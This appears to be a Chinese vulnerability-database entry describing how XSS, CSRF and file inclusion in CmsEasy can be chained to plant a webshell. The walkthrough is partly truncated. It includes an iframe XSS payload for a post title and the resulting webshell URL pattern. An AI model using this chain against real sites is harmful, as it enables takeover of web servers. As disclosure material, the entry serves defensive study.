CmsEasy 利用xss等漏洞GetShell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 利用XSS+CSRF+LFI即可从前台直接拿到webshell ### 详细说明: ``` None ``` 把此页面放到另外一个站点空间下,如url链接: http://localhost/cmseasy-csrf.html 第三步,然后在第一步的帖子标题中插入xss,xss code内容如下: `><iframe src= http://localhost/cmseasy-csrf.html >//src后面的url一定不能加` 写好帖子,保存,发布此帖子即可。 第四步,当管理员进行帖子管理时,就会触发帖子标题处的xss,发送请求,添加表单,得到webshll。如下如管理员进行帖子管理时,成功添加了表单。 [<img src="https://images.seebug.org/upload/201311/26095409c44bcbdedd6f413aee61061c94425a61.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/26095409c44bcbdedd6f413aee61061c94425a61.png) 得到的webshell的地址为: http://localhost/cmseasy/index.php?case=form&act=add&form=my_88888888,form的值就是你csrf请求页面里卖弄的name的值,即表单名。 菜刀成功连接,得到webshell。 [<img src="https://images.seebug.org/upload/201311/26095426d9c5167ce65df25b2d2293e06318907d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/26095426d9c5167ce65df25b2d2293e06318907d.png) 当然利用上面的四种漏洞,还能综合利用,多种方法都能拿到webshell ### 漏洞证明: 见详细说明

0%
暂无可用Exp或PoC
当前有0条受影响产品信息